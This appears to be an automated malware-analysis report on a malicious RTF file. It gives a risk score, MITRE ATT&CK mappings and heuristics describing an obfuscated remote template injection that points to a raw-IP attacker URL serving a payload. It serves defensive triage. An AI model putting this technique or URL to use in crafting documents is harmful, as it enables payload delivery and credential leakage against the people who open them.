MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The RTF document contains a critical heuristic indicating remote template injection, targeting the URL http://45.197.132.68/public/img/fav.ico. This technique is commonly used to download and execute malicious payloads. The minimal document body content does not provide further context, but the presence of the remote template injection strongly suggests an attempt to compromise the user's system.
Heuristics 2
-
Remote template injection (\*\template → remote URL) critical RTF_REMOTE_TEMPLATEThe RTF's \*\template destination is a remote URL/UNC path. When Word opens the document it fetches and loads that template, which can carry macros or an exploit, deliver a scriptlet/HTA, or leak NTLM credentials over UNC. Benign documents attach only a local template, so a remote \*\template target is template-injection delivery (MITRE T1221). remote \*\template target (Word fetches it on open); destination obfuscated with \uN/\'xx escapes; raw IP host 45.197.132.68.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://45.197.132.68/public/img/fav.ico
- http://schemas.microsoft.com/office/word/2003/wordml
Open this report in the interactive analyzer, or submit your own file for analysis.